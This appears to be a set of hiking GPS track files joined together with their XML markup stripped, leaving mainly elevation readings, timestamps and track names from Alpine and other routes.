+2015-05-10T08:10:43Z
+
+
+
+
+
+939.2
+2015-05-10T08:12:23Z
+
+
+
+
+
+989.4
+2015-05-10T08:15:35Z
+
+
+
+
+
+1013.2
+2015-05-10T08:17:05Z
+
+
+
+
+
+1027.4
+2015-05-10T08:18:04Z
+
+
+
+
+
+1040.6
+2015-05-10T08:18:58Z
+
+
+
+
+
+1053.4
+2015-05-10T08:19:51Z
+
+
+
+
+
+1062.4
+2015-05-10T08:20:27Z
+
+
+
+
+
+1069.6
+2015-05-10T08:20:55Z
+
+
+
+
+
+1074.4
+2015-05-10T08:21:11Z
+
+
+
+
+
+1103.8
+2015-05-10T08:23:03Z
+
+
+
+
+
+1128.0
+2015-05-10T08:24:40Z
+
+
+
+
+
+1134.2
+2015-05-10T08:25:02Z
+
+
+
+
+
+1178.4
+2015-05-10T08:27:58Z
+
+
+
+
+
+1187.4
+2015-05-10T08:28:34Z
+
+
+
+
+
+1206.6
+2015-05-10T08:29:23Z
+
+
+
+ "
+"
+
+
+2017.10.07 Capanna Cava
+
+
+
+
+
+
+
+
+
+2004.7
+
+
+2012.1
+
+
+2020.5
+
+
+2030.8014081711285
+
+
+2037.8999677711997
+
+
+2042.099999866902
+
+
+2050.6
+
+
+2054.100010711014
+
+
+2065.500029816756
+
+
+2065.799992439151
+
+
+2072.0998858671724
+
+
+2082.69997771037
+
+
+2098.399969498185
+
+
+2116.1001188570513
+
+
+2166.800032822942
+
+
+2177.999981964324
+
+
+2199.3999338438393
+
+
+2215.0999361615586
+
+
+2226.200003787706
+
+
+2259.4999589392733
+
+
+2255.2
+
+
+2292.8
+
+
+2302.8
+
+
+2340.3
+
+
+2370.7
+
+
+2368.3
+
+
+2359.4
+
+
+2348.7
+
+
+2346.6
+
+
+2349.4
+
+
+2357.9
+
+
+2361.2
+
+
+2344.9
+
+
+2304.9
+
+
+2281.9
+
+
+2089.1
+
+
+2073.599964473042
+
+
+2068.199990798241
+
+
+2065.5000198042426
+
+
+2065.7999924391565
+
+
+2065.5000298168757
+
+
+2054.1000107114114
+
+
+2050.6
+
+
+2042.099999866902
+
+
+2037.8999677711965
+
+
+2021.7000135739654
+
+
+2011.4
+
+
+2004.5
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-30T12:17:47Z
+
+AUG-30-14 14:17:45
+
+
+
+2242.41
+2014-08-30T10:41:56Z
+
+
+2247.7
+2014-08-30T10:48:49Z
+
+
+2253.95
+2014-08-30T10:50:11Z
+
+
+2261.64
+2014-08-30T10:51:04Z
+
+
+2281.35
+2014-08-30T10:54:01Z
+
+
+2285.67
+2014-08-30T10:55:34Z
+
+
+2289.04
+2014-08-30T10:58:16Z
+
+
+2306.82
+2014-08-30T11:01:46Z
+
+
+2315.95
+2014-08-30T11:03:29Z
+
+
+2321.24
+2014-08-30T11:05:13Z
+
+
+2352.0
+2014-08-30T11:10:39Z
+
+
+2364.02
+2014-08-30T11:11:52Z
+
+
+2375.07
+2014-08-30T11:13:17Z
+
+
+2385.65
+2014-08-30T11:14:47Z
+
+
+2397.67
+2014-08-30T11:16:12Z
+
+
+2426.99
+2014-08-30T11:19:27Z
+
+
+2451.02
+2014-08-30T11:22:05Z
+
+
+2474.09
+2014-08-30T11:24:28Z
+
+
+2481.78
+2014-08-30T11:26:10Z
+
+
+2481.78
+2014-08-30T11:28:32Z
+
+
+2488.03
+2014-08-30T11:29:56Z
+
+
+2491.87
+2014-08-30T11:31:06Z
+
+
+2496.68
+2014-08-30T11:33:12Z
+
+
+2502.93
+2014-08-30T11:34:44Z
+
+
+2509.66
+2014-08-30T11:37:08Z
+
+
+2508.22
+2014-08-30T11:38:05Z
+
+
+2502.45
+2014-08-30T11:39:51Z
+
+
+2497.64
+2014-08-30T11:41:31Z
+
+
+2501.97
+2014-08-30T11:49:28Z
+
+
+2502.45
+2014-08-30T11:50:13Z
+
+
+2510.62
+2014-08-30T11:51:28Z
+
+
+2521.19
+2014-08-30T11:52:54Z
+
+
+2528.4
+2014-08-30T11:53:45Z
+
+
+2530.33
+2014-08-30T11:54:12Z
+
+
+2535.13
+2014-08-30T11:55:12Z
+
+
+2541.86
+2014-08-30T11:57:14Z
+
+
+2544.27
+2014-08-30T11:58:57Z
+
+
+2542.34
+2014-08-30T12:01:54Z
+
+
+2539.94
+2014-08-30T12:03:11Z
+
+
+2538.5
+2014-08-30T12:03:57Z
+
+
+2543.31
+2014-08-30T12:05:04Z
+
+
+2555.32
+2014-08-30T12:06:52Z
+
+
+2565.9
+2014-08-30T12:08:20Z
+
+
+2574.07
+2014-08-30T12:09:42Z
+
+
+2589.93
+2014-08-30T12:17:38Z
+ "
+"
+
+
+Eich
+
+Monika Teusch - Community
+
+
+
+2016-01-10T12:59:46Z
+
+Eich
+
+
+
+698.28894
+
+
+694.65356
+
+
+691.26074
+
+
+684.80359
+
+
+675.74622
+
+
+681.61365
+
+
+684.36133
+
+
+688.40918
+
+
+699.87354
+
+
+702.05689
+
+
+701.01306
+
+
+700.58752
+
+
+703.06885
+
+
+708.40088
+
+
+711.90894
+
+
+709.51099
+
+
+712.27612
+
+
+716.40735
+
+
+715.89478
+
+
+724.21362
+
+
+712.77319
+
+
+686.87219
+
+
+687.8335
+
+
+681.96802
+
+
+686.4707
+
+
+681.99951
+
+
+678.87622
+
+
+677.95032
+
+
+686.2356
+
+
+696.12036
+
+
+714.12769
+
+
+731.83545
+
+
+733.1687
+
+
+732.59412
+
+
+733.62036
+
+
+740.9458
+
+
+748.68945
+
+
+754.25024
+
+
+763.53491
+
+
+773.44678
+
+
+791.18311
+
+
+803.82007
+
+
+797.79968
+
+
+793.81958
+
+
+790.30322
+
+
+782.76831
+
+
+770.21033
+
+
+764.66187
+
+
+761.03259
+
+
+744.43311
+
+
+730.77905
+
+
+733.64539
+
+
+731.48584
+
+
+722.26392
+
+
+712.22022
+
+
+710.3584
+
+
+705.67529
+
+
+688.19617
+
+
+665.71753
+
+
+660.62268
+
+
+658.01221
+
+
+651.43042
+
+
+650.0343
+
+
+651.82105
+
+
+644.66943
+
+
+646.05383
+
+
+641.48617
+ "
+"
+
+
+
+
+
+
+2016-08-15T14:44:29Z
+
+
+Traccia corrente: 15 AGO 2016 07:31
+Traccia corrente: 15 AGO 2016 07:31
+
+
+
+1218.609985
+2016-08-15T05:31:47Z
+
+
+1227.73999
+2016-08-15T05:34:23Z
+
+
+1240.719971
+2016-08-15T05:37:01Z
+
+
+1245.040039
+2016-08-15T05:37:43Z
+
+
+1264.27002
+2016-08-15T05:40:18Z
+
+
+1270.040039
+2016-08-15T05:41:17Z
+
+
+1274.849976
+2016-08-15T05:42:15Z
+
+
+1291.189941
+2016-08-15T05:43:55Z
+
+
+1302.719971
+2016-08-15T05:45:11Z
+
+
+1321.950073
+2016-08-15T05:47:47Z
+
+
+1323.869873
+2016-08-15T05:48:38Z
+
+
+1343.099976
+2016-08-15T05:51:12Z
+
+
+1356.560059
+2016-08-15T05:52:44Z
+
+
+1385.399902
+2016-08-15T05:56:45Z
+
+
+1392.130005
+2016-08-15T05:57:38Z
+
+
+1413.76001
+2016-08-15T06:00:13Z
+
+
+1422.410034
+2016-08-15T06:01:17Z
+
+
+1442.109985
+2016-08-15T06:03:31Z
+
+
+1452.209961
+2016-08-15T06:04:43Z
+
+
+1456.529907
+2016-08-15T06:05:14Z
+
+
+1469.51001
+2016-08-15T06:06:38Z
+
+
+1507.0
+2016-08-15T06:10:48Z
+
+
+1533.440063
+2016-08-15T06:13:38Z
+
+
+1557.469971
+2016-08-15T06:16:38Z
+
+
+1573.820068
+2016-08-15T06:18:27Z
+
+
+1583.910034
+2016-08-15T06:21:16Z
+
+
+1611.790039
+2016-08-15T06:25:16Z
+
+
+1657.450073
+2016-08-15T06:32:52Z
+
+
+1677.640015
+2016-08-15T06:36:50Z
+
+
+1692.059937
+2016-08-15T06:38:23Z
+
+
+1747.809937
+2016-08-15T06:44:38Z
+
+
+1795.880005
+2016-08-15T06:50:37Z
+
+
+1855.47998
+2016-08-15T06:57:36Z
+
+
+1867.980103
+2016-08-15T06:59:10Z
+
+
+1891.530029
+2016-08-15T07:02:01Z
+
+
+1940.079956
+2016-08-15T07:07:38Z
+
+
+1955.460083
+2016-08-15T07:10:32Z
+
+
+1975.169922
+2016-08-15T07:12:57Z
+
+
+1999.200073
+2016-08-15T07:16:00Z
+
+
+2015.060059
+2016-08-15T07:18:05Z
+
+
+2041.02002
+2016-08-15T07:21:05Z
+
+
+2083.790039
+2016-08-15T07:25:46Z
+
+
+2091.0
+2016-08-15T07:30:16Z
+
+
+
+2091.48999
+2016-08-15T07:30:48Z
+
+
+2096.77002
+2016-08-15T07:32:33Z
+
+
+2113.600098
+2016-08-15T07:34:52Z
+
+
+2160.699951
+2016-08-15T07:41:01Z
+
+
+2207.319824
+2016-08-15T07:47:36Z
+
+
+2231.360107
+2016-08-15T07:50:23Z
+
+
+2238.570068
+2016-08-15T07:51:56Z
+
+
+2247.699951
+2016-08-15T07:52:55Z
+
+
+2266.449951
+2016-08-15T07:57:46Z
+
+
+2270.290039
+2016-08-15T08:01:51Z
+
+
+2297.209961
+2016-08-15T08:05:10Z
+
+
+2348.159912
+2016-08-15T08:11:39Z
+
+
+2363.540039
+2016-08-15T08:14:33Z
+
+
+2385.649902
+2016-08-15T08:20:43Z
+
+
+2389.969971
+2016-08-15T08:21:38Z
+
+
+2414.969971
+2016-08-15T08:27:16Z
+
+
+2433.709961
+2016-08-15T08:34:05Z
+
+
+2446.209961
+2016-08-15T08:37:42Z
+
+
+2483.699951
+2016-08-15T08:45:49Z
+
+
+2501.01001
+2016-08-15T08:48:40Z
+
+
+2515.429932
+2016-08-15T08:52:38Z
+
+
+2563.01001
+2016-08-15T09:06:46Z
+
+
+2602.429932
+2016-08-15T09:20:26Z
+
+
+2602.429932
+2016-08-15T09:24:31Z
+
+
+2616.850098
+2016-08-15T09:27:15Z
+
+
+2628.379883
+2016-08-15T09:29:03Z
+
+
+2634.629883
+2016-08-15T09:31:00Z
+
+
+2686.060059
+2016-08-15T09:46:32Z
+ "
+"
+
+
+
+
+
+
+
+Traccia 1/3/2017
+
+
+
+521.0
+2017-03-01T16:35:52Z
+
+
+549.0
+2017-03-01T16:36:40Z
+
+
+551.0
+2017-03-01T16:36:46Z
+
+
+532.0
+2017-03-01T16:37:45Z
+
+
+546.0
+2017-03-01T16:39:09Z
+
+
+547.0
+2017-03-01T16:39:30Z
+
+
+549.0
+2017-03-01T16:40:04Z
+
+
+562.0
+2017-03-01T16:40:14Z
+
+
+542.0
+2017-03-01T16:40:30Z
+
+
+555.0
+2017-03-01T16:40:49Z
+
+
+553.0
+2017-03-01T16:41:05Z
+
+
+572.0
+2017-03-01T16:41:54Z
+
+
+603.0
+2017-03-01T16:42:57Z
+
+
+604.0
+2017-03-01T16:43:19Z
+
+
+593.0
+2017-03-01T16:43:37Z
+
+
+578.0
+2017-03-01T16:44:13Z
+
+
+602.0
+2017-03-01T16:44:55Z
+
+
+622.0
+2017-03-01T16:46:25Z
+
+
+635.0
+2017-03-01T16:48:06Z
+
+
+634.0
+2017-03-01T16:48:55Z
+
+
+587.0
+2017-03-01T16:49:51Z
+
+
+641.0
+2017-03-01T16:50:10Z
+
+
+650.0
+2017-03-01T16:50:23Z
+
+
+644.0
+2017-03-01T16:50:25Z
+
+
+672.0
+2017-03-01T16:52:25Z
+
+
+691.0
+2017-03-01T16:54:05Z
+
+
+685.0
+2017-03-01T16:54:43Z
+
+
+679.0
+2017-03-01T16:55:00Z
+
+
+660.0
+2017-03-01T16:55:10Z
+
+
+669.0
+2017-03-01T16:55:40Z
+
+
+681.0
+2017-03-01T16:56:20Z
+
+
+685.0
+2017-03-01T16:56:50Z
+
+
+679.0
+2017-03-01T16:57:06Z
+
+
+684.0
+2017-03-01T16:58:24Z
+
+
+710.0
+2017-03-01T16:59:29Z
+
+
+729.0
+2017-03-01T17:01:17Z
+
+
+746.0
+2017-03-01T17:01:49Z
+
+
+786.0
+2017-03-01T17:05:09Z
+
+
+760.0
+2017-03-01T17:05:49Z
+
+
+773.0
+2017-03-01T17:06:34Z
+
+
+780.0
+2017-03-01T17:07:09Z
+
+
+770.0
+2017-03-01T17:08:15Z
+
+
+792.0
+2017-03-01T17:09:04Z
+
+
+795.0
+2017-03-01T17:09:39Z
+
+
+790.0
+2017-03-01T17:09:49Z
+
+
+793.0
+2017-03-01T17:09:59Z
+
+
+799.0
+2017-03-01T17:10:50Z
+
+
+797.0
+2017-03-01T17:11:19Z
+
+
+791.0
+2017-03-01T17:11:59Z
+
+
+820.0
+2017-03-01T17:12:13Z
+
+
+824.0
+2017-03-01T17:12:19Z
+
+
+819.0
+2017-03-01T17:12:53Z
+
+
+824.0
+2017-03-01T17:13:37Z
+
+
+834.0
+2017-03-01T17:14:38Z
+
+
+837.0
+2017-03-01T17:15:14Z
+
+
+836.0
+2017-03-01T17:15:43Z
+
+
+839.0
+2017-03-01T17:15:49Z
+
+
+862.0
+2017-03-01T17:17:58Z
+
+
+882.0
+2017-03-01T17:18:27Z
+
+
+886.0
+2017-03-01T17:18:39Z
+
+
+882.0
+2017-03-01T17:18:52Z
+
+
+873.0
+2017-03-01T17:19:13Z
+
+
+899.0
+2017-03-01T17:20:31Z
+
+
+885.0
+2017-03-01T17:20:52Z
+
+
+886.0
+2017-03-01T17:21:32Z
+
+
+923.0
+2017-03-01T17:23:07Z
+
+
+939.0
+2017-03-01T17:23:59Z
+
+
+947.0
+2017-03-01T17:24:36Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+8
+
+
+
+3104.2
+
+
+3070.6
+
+
+3061.9
+
+
+3040.3
+
+
+3029.3
+
+
+3025.9
+
+
+3011.0
+
+
+3001.9
+
+
+2993.2
+
+
+2980.2
+
+
+2985.5
+
+
+2996.1
+
+
+3014.4
+
+
+3036.0
+
+
+3040.8
+
+
+3043.2
+
+
+3049.4
+
+
+3051.8
+
+
+3056.2
+
+
+3061.5
+
+
+3073.0
+
+
+3078.8
+
+
+3102.8
+
+
+3107.6
+
+
+3115.8
+
+
+3120.6
+
+
+3126.8
+
+
+3131.2
+
+
+3161.9
+
+
+3168.2
+
+
+3178.7
+
+
+3193.6
+
+
+3203.2
+
+
+3220.6
+
+
+3224.4
+
+
+3229.2
+
+
+3244.1
+
+
+3250.4
+
+
+3260.4
+
+
+3282.6
+
+
+3295.5
+
+
+3302.7
+
+
+3308.0
+
+
+3328.7
+
+
+3332.1
+
+
+3342.6
+
+
+3356.6
+
+
+3383.5
+
+
+3394.6
+
+
+3405.1
+
+
+3417.6
+ "
+"
+
+
+
+
+
+
+
+Linie
+
+
+
+956.3
+
+
+965.7
+
+
+981.6
+
+
+984.4
+
+
+998.5
+
+
+1021.5
+
+
+1055.5
+
+
+1078.1
+
+
+1113.1
+
+
+1140.0
+
+
+1138.9
+
+
+1153.6
+
+
+1195.5
+
+
+1218.3
+
+
+1217.9
+
+
+1214.7
+
+
+1216.6
+
+
+1237.7
+
+
+1236.1
+
+
+1248.0
+
+
+1264.6
+
+
+1261.6
+
+
+1278.9
+
+
+1279.2
+
+
+1282.9
+
+
+1291.0
+
+
+1312.6
+
+
+1314.8
+
+
+1349.6
+
+
+1356.3
+
+
+1375.4
+
+
+1370.8
+
+
+1385.3
+
+
+1385.1
+
+
+1397.1
+
+
+1411.1
+
+
+1434.3
+
+
+1448.0
+
+
+1465.7
+
+
+1476.6
+
+
+1494.4
+
+
+1509.0
+
+
+1522.7
+
+
+1535.6
+
+
+1542.7
+
+
+1555.9
+
+
+1563.2
+
+
+1583.7
+ "
+"
+
+
+
+
+
+
+
+Arera
+
+
+
+
+1586.295898
+2016-07-10T07:29:21Z
+
+2.0
+3.2
+
+1593.122314
+2016-07-10T07:31:19Z
+
+1.0
+1.4
+
+1599.245605
+2016-07-10T07:31:59Z
+
+1.0
+1.4
+
+1628.968506
+2016-07-10T07:34:21Z
+
+1.0
+1.4
+
+1635.718994
+2016-07-10T07:34:46Z
+
+1.0
+1.4
+
+1646.760742
+2016-07-10T07:35:50Z
+
+1.0
+1.4
+
+1660.842773
+2016-07-10T07:36:57Z
+
+1.0
+1.4
+
+1734.270508
+2016-07-10T07:42:52Z
+
+1.0
+1.4
+
+1762.068848
+2016-07-10T07:44:48Z
+
+1.0
+1.4
+
+1791.494629
+2016-07-10T07:46:56Z
+
+1.0
+1.4
+
+1812.611328
+2016-07-10T07:48:33Z
+
+1.0
+1.4
+
+1831.404785
+2016-07-10T07:50:00Z
+
+1.0
+1.4
+
+1872.55957
+2016-07-10T07:54:00Z
+
+1.0
+1.4
+
+1901.560547
+2016-07-10T07:56:43Z
+
+1.0
+1.4
+
+1921.313477
+2016-07-10T07:58:07Z
+
+1.0
+1.4
+
+1933.297852
+2016-07-10T07:59:14Z
+
+1.0
+1.4
+
+1937.616211
+2016-07-10T07:59:47Z
+
+1.0
+1.4
+
+1962.240479
+2016-07-10T08:03:43Z
+
+1.0
+1.4
+
+
+1977.125488
+2016-07-10T08:14:20Z
+
+2.0
+3.2
+
+1962.932838
+2016-07-10T08:15:43Z
+
+1.0
+1.4
+
+1986.818336
+2016-07-10T08:18:18Z
+
+1.0
+1.4
+
+1990.233376
+2016-07-10T08:19:25Z
+
+1.0
+1.4
+
+1993.756813
+2016-07-10T08:21:49Z
+
+1.0
+1.4
+
+2032.253883
+2016-07-10T08:25:05Z
+
+1.0
+1.4
+
+2038.579079
+2016-07-10T08:25:42Z
+
+1.0
+1.4
+
+2066.692604
+2016-07-10T08:27:45Z
+
+1.0
+1.4
+
+2141.874489
+2016-07-10T08:33:46Z
+
+1.0
+1.4
+
+2162.861549
+2016-07-10T08:35:37Z
+
+1.0
+1.4
+
+2216.68821
+2016-07-10T08:40:12Z
+
+1.0
+1.4
+
+2239.56736
+2016-07-10T08:42:05Z
+
+1.0
+1.4
+
+2269.647682
+2016-07-10T08:44:15Z
+
+1.0
+1.4
+
+2302.073708
+2016-07-10T08:47:08Z
+
+1.0
+1.4
+
+2308.93943
+2016-07-10T08:48:47Z
+
+1.0
+1.4
+
+2334.150124
+2016-07-10T08:50:48Z
+
+1.0
+1.4
+
+2366.962379
+2016-07-10T08:53:34Z
+
+1.0
+1.4
+
+2388.630592
+2016-07-10T08:55:15Z
+
+1.0
+1.4
+
+2405.932594
+2016-07-10T08:56:50Z
+
+1.0
+1.4
+
+2414.529518
+2016-07-10T08:57:48Z
+
+1.0
+1.4
+
+2418.03318
+2016-07-10T08:59:28Z
+
+1.0
+1.4
+
+2416.368385
+2016-07-10T09:02:00Z
+
+1.0
+1.4
+
+2412.930885
+2016-07-10T09:05:01Z
+
+2.0
+2.6
+
+2413.911598
+2016-07-10T09:06:19Z
+
+2.0
+2.8
+
+2412.736794
+2016-07-10T09:06:44Z
+
+1.0
+1.2
+
+2448.689186
+2016-07-10T09:11:27Z
+
+1.0
+1.4
+
+2463.585182
+2016-07-10T09:12:36Z
+
+1.0
+1.4
+
+2478.563698
+2016-07-10T09:13:56Z
+
+1.0
+1.4
+
+2502.200905
+2016-07-10T09:15:39Z
+
+1.0
+1.4
+
+2509.015114
+2016-07-10T09:16:57Z
+
+1.0
+1.4 "
+"
+
+
+
+
+
+
+2016-07-24T00:29:25Z
+
+
+Inspiration Point (Bryce Canyon)
+
+
+
+2487.0
+2016-07-24T00:29:25Z
+
+
+
+
+0.000000
+
+2461.0
+2016-07-24T00:33:10Z
+
+
+
+
+6.572899
+
+2477.0
+2016-07-24T00:35:24Z
+
+
+
+
+3.504578
+
+2488.0
+2016-07-24T00:36:08Z
+
+
+
+
+4.252090
+
+2478.0
+2016-07-24T00:36:47Z
+
+
+
+
+2.194794
+
+2495.0
+2016-07-24T00:40:09Z
+
+
+
+
+12.490112
+
+2498.0
+2016-07-24T00:40:49Z
+
+
+
+
+2.137543
+
+2500.0
+2016-07-24T00:41:33Z
+
+
+
+
+9.408661
+
+2505.0
+2016-07-24T00:42:10Z
+
+
+
+
+1.424591
+
+2477.0
+2016-07-24T00:48:09Z
+
+
+
+
+1.423157
+
+2505.0
+2016-07-24T00:55:15Z
+
+
+
+
+8.535461
+
+2497.0
+2016-07-24T01:00:42Z
+
+
+
+
+1.014099
+
+2466.0
+2016-07-24T01:04:23Z
+
+
+
+
+8.173828
+
+2488.0
+2016-07-24T01:05:59Z
+
+
+
+
+2.167603
+
+2489.0
+2016-07-24T01:06:16Z
+
+
+
+
+7.634766 "
+"
+
+
+
+
+
+
+Garmin International
+2015-10-12T05:47:38Z
+
+
+07.10.15, 14:00:03
+
+
+
+
+
+
+1068.4000244140625
+2015-10-07T12:00:03Z
+
+
+
+
+
+1068.5999755859375
+2015-10-07T12:00:30Z
+
+
+
+
+
+1081.5999755859375
+2015-10-07T12:02:35Z
+
+
+
+
+
+1087.0
+2015-10-07T12:03:32Z
+
+
+
+
+
+1090.199951171875
+2015-10-07T12:03:52Z
+
+
+
+
+
+1105.0
+2015-10-07T12:06:00Z
+
+
+
+
+
+1110.800048828125
+2015-10-07T12:07:00Z
+
+
+
+
+
+1116.800048828125
+2015-10-07T12:07:49Z
+
+
+
+
+
+1122.199951171875
+2015-10-07T12:08:45Z
+
+
+
+
+
+1129.0
+2015-10-07T12:09:54Z
+
+
+
+
+
+1134.5999755859375
+2015-10-07T12:11:12Z
+
+
+
+
+
+1142.4000244140625
+2015-10-07T12:12:52Z
+
+
+
+
+
+1158.800048828125
+2015-10-07T12:15:18Z
+
+
+
+
+
+1170.5999755859375
+2015-10-07T12:17:01Z
+
+
+
+
+
+1189.800048828125
+2015-10-07T12:19:26Z
+
+
+
+
+
+1227.0
+2015-10-07T12:26:14Z
+
+
+
+
+
+1234.0
+2015-10-07T12:27:32Z
+
+
+
+
+
+1267.4000244140625
+2015-10-07T12:32:12Z
+
+
+
+
+
+1303.5999755859375
+2015-10-07T12:37:07Z
+
+
+
+
+
+1314.4000244140625
+2015-10-07T12:38:56Z
+
+
+
+
+
+1322.199951171875
+2015-10-07T12:40:01Z
+
+
+
+
+
+1338.199951171875
+2015-10-07T12:42:11Z
+
+
+
+
+
+1350.0
+2015-10-07T12:43:58Z
+
+
+
+
+
+1356.5999755859375
+2015-10-07T12:44:56Z
+
+
+
+
+
+1364.199951171875
+2015-10-07T12:46:32Z
+
+
+
+
+
+1371.4000244140625
+2015-10-07T12:48:01Z
+
+
+
+
+
+1369.4000244140625
+2015-10-07T12:48:49Z
+
+
+
+
+
+1366.5999755859375
+2015-10-07T12:49:52Z
+
+
+
+
+
+1364.800048828125
+2015-10-07T12:50:46Z
+
+
+
+
+
+1357.4000244140625
+2015-10-07T12:51:24Z
+
+
+
+
+
+1369.199951171875
+2015-10-07T12:53:21Z
+
+
+
+
+
+1378.0
+2015-10-07T12:54:27Z
+
+
+
+
+
+1391.199951171875
+2015-10-07T12:56:12Z
+
+
+
+
+
+1392.199951171875
+2015-10-07T12:57:39Z
+
+
+
+
+
+1385.0
+2015-10-07T12:59:52Z
+
+
+
+
+
+1376.0
+2015-10-07T13:00:39Z
+
+
+
+
+
+1357.800048828125
+2015-10-07T13:02:58Z
+
+
+
+
+
+1350.4000244140625
+2015-10-07T13:03:46Z
+
+
+
+
+
+1346.0
+2015-10-07T13:04:08Z
+
+
+
+
+
+1325.199951171875
+2015-10-07T13:05:10Z
+
+
+
+ "
+"
+
+
+
+
+
+
+
+Schönwieskopf
+
+
+
+1454.0
+2018-01-02T11:21:52Z
+
+
+1446.0
+2018-01-02T11:32:49Z
+
+
+1480.0
+2018-01-02T11:37:19Z
+
+
+1508.0
+2018-01-02T11:40:15Z
+
+
+1544.0
+2018-01-02T11:44:57Z
+
+
+1546.0
+2018-01-02T11:46:36Z
+
+
+1555.0
+2018-01-02T11:48:19Z
+
+
+1569.0
+2018-01-02T11:49:42Z
+
+
+1587.0
+2018-01-02T11:51:57Z
+
+
+1610.0
+2018-01-02T11:55:51Z
+
+
+1618.0
+2018-01-02T11:56:21Z
+
+
+1612.0
+2018-01-02T11:57:36Z
+
+
+1637.0
+2018-01-02T12:00:45Z
+
+
+1671.0
+2018-01-02T12:04:06Z
+
+
+1690.0
+2018-01-02T12:08:00Z
+
+
+1696.0
+2018-01-02T12:08:30Z
+
+
+1731.0
+2018-01-02T12:11:56Z
+
+
+1833.0
+2018-01-02T12:27:21Z
+
+
+1907.0
+2018-01-02T12:36:21Z
+
+
+1953.0
+2018-01-02T12:40:31Z
+
+
+2033.0
+2018-01-02T12:49:21Z
+
+
+2025.0
+2018-01-02T13:05:01Z
+
+
+2012.0
+2018-01-02T13:05:31Z
+
+
+1984.0
+2018-01-02T13:07:20Z
+
+
+1921.0
+2018-01-02T13:11:01Z
+
+
+1874.0
+2018-01-02T13:13:26Z
+
+
+1778.0
+2018-01-02T13:19:41Z
+
+
+1774.0
+2018-01-02T13:20:55Z
+
+
+1733.0
+2018-01-02T13:31:47Z
+
+
+1711.0
+2018-01-02T13:32:33Z
+
+
+1695.0
+2018-01-02T13:33:48Z
+
+
+1629.0
+2018-01-02T13:36:27Z
+
+
+1597.0
+2018-01-02T13:42:17Z
+
+
+1578.0
+2018-01-02T13:42:53Z
+
+
+1562.0
+2018-01-02T13:43:58Z
+
+
+1541.0
+2018-01-02T13:45:02Z
+
+
+1533.0
+2018-01-02T13:46:03Z
+
+
+1524.0
+2018-01-02T13:47:33Z
+
+
+1513.0
+2018-01-02T13:48:32Z
+
+
+1465.0
+2018-01-02T13:54:23Z
+
+
+1451.0
+2018-01-02T13:55:18Z
+
+
+1440.0
+2018-01-02T14:14:03Z
+
+
+1440.0
+2018-01-02T14:15:58Z
+
+
+1439.0
+2018-01-02T14:17:23Z
+
+
+1425.0
+2018-01-02T14:18:48Z
+
+
+1425.0
+2018-01-02T14:20:43Z
+
+
+1416.0
+2018-01-02T14:22:03Z
+
+
+1405.0
+2018-01-02T14:23:39Z
+
+
+1403.0
+2018-01-02T14:23:53Z
+
+
+1388.0
+2018-01-02T14:24:28Z
+
+
+1374.0
+2018-01-02T14:26:08Z
+
+
+1352.0
+2018-01-02T14:26:38Z
+
+
+1350.0
+2018-01-02T14:29:13Z
+
+
+1319.0
+2018-01-02T14:30:38Z
+
+
+1312.0
+2018-01-02T14:30:58Z
+
+
+1313.0
+2018-01-02T14:32:39Z
+
+
+1315.0
+2018-01-02T14:33:04Z
+
+
+1301.0
+2018-01-02T14:34:38Z
+
+
+1311.0
+2018-01-02T14:34:58Z
+
+
+1288.0
+2018-01-02T14:35:43Z
+
+
+1261.0
+2018-01-02T14:44:53Z
+
+
+1239.0
+2018-01-02T14:45:08Z
+
+
+1238.0
+2018-01-02T14:46:08Z
+
+
+1226.0
+2018-01-02T14:47:38Z
+
+
+1207.0
+2018-01-02T14:48:18Z
+
+
+1181.0
+2018-01-02T14:49:27Z
+
+
+1137.0
+2018-01-02T14:52:13Z
+
+
+1121.0
+2018-01-02T14:53:28Z
+
+
+1119.0
+2018-01-02T14:54:28Z
+
+
+1072.0
+2018-01-02T14:56:14Z
+
+
+1087.0
+2018-01-02T14:57:03Z
+
+
+1076.0
+2018-01-02T15:06:08Z
+
+
+1071.0
+2018-01-02T15:07:52Z
+ "
+"
+
+
+eremo san grato
+ 25/ago/2015 13:58:34
+
+
+1854.0
+2015-08-25T11:58:34Z
+
+1796.0
+2015-08-25T12:00:07Z
+
+1786.0
+2015-08-25T12:01:26Z
+
+1799.0
+2015-08-25T12:02:21Z
+
+1786.0
+2015-08-25T12:04:52Z
+
+1791.0
+2015-08-25T12:06:25Z
+
+1796.0
+2015-08-25T12:09:04Z
+
+1782.0
+2015-08-25T12:11:02Z
+
+1779.0
+2015-08-25T12:12:25Z
+
+1770.0
+2015-08-25T12:13:52Z
+
+1781.0
+2015-08-25T12:15:17Z
+
+1755.0
+2015-08-25T12:17:02Z
+
+1775.0
+2015-08-25T12:18:29Z
+
+1782.0
+2015-08-25T12:19:10Z
+
+1772.0
+2015-08-25T12:20:24Z
+
+1800.0
+2015-08-25T12:21:30Z
+
+1782.0
+2015-08-25T12:22:26Z
+
+1766.0
+2015-08-25T12:24:05Z
+
+1765.0
+2015-08-25T12:25:05Z
+
+1766.0
+2015-08-25T12:26:11Z
+
+1759.0
+2015-08-25T12:27:11Z "
+"
+
+
+
+
+
+
+Garmin International
+2014-12-30T17:12:34Z
+
+
+Lombardia - Roccoli Lorla - Monte Legnone
+
+
+
+
+
+
+1441.41
+2014-12-30T07:31:03Z
+
+
+1442.35
+2014-12-30T07:31:19Z
+
+
+1453.24
+2014-12-30T07:32:30Z
+
+
+1462.53
+2014-12-30T07:33:52Z
+
+
+1450.52
+2014-12-30T07:37:23Z
+
+
+1468.94
+2014-12-30T07:38:47Z
+
+
+1477.67
+2014-12-30T07:39:30Z
+
+
+1487.9
+2014-12-30T07:40:19Z
+
+
+1500.66
+2014-12-30T07:42:25Z
+
+
+1520.98
+2014-12-30T07:45:14Z
+
+
+1533.05
+2014-12-30T07:48:29Z
+
+
+1531.11
+2014-12-30T07:49:21Z
+
+
+1546.79
+2014-12-30T07:51:09Z
+
+
+1558.47
+2014-12-30T07:54:10Z
+
+
+1564.9
+2014-12-30T07:55:01Z
+
+
+1586.41
+2014-12-30T07:58:27Z
+
+
+1594.14
+2014-12-30T07:59:20Z
+
+
+1597.19
+2014-12-30T07:59:36Z
+
+
+1611.05
+2014-12-30T08:01:12Z
+
+
+1624.04
+2014-12-30T08:03:13Z
+
+
+1634.77
+2014-12-30T08:04:36Z
+
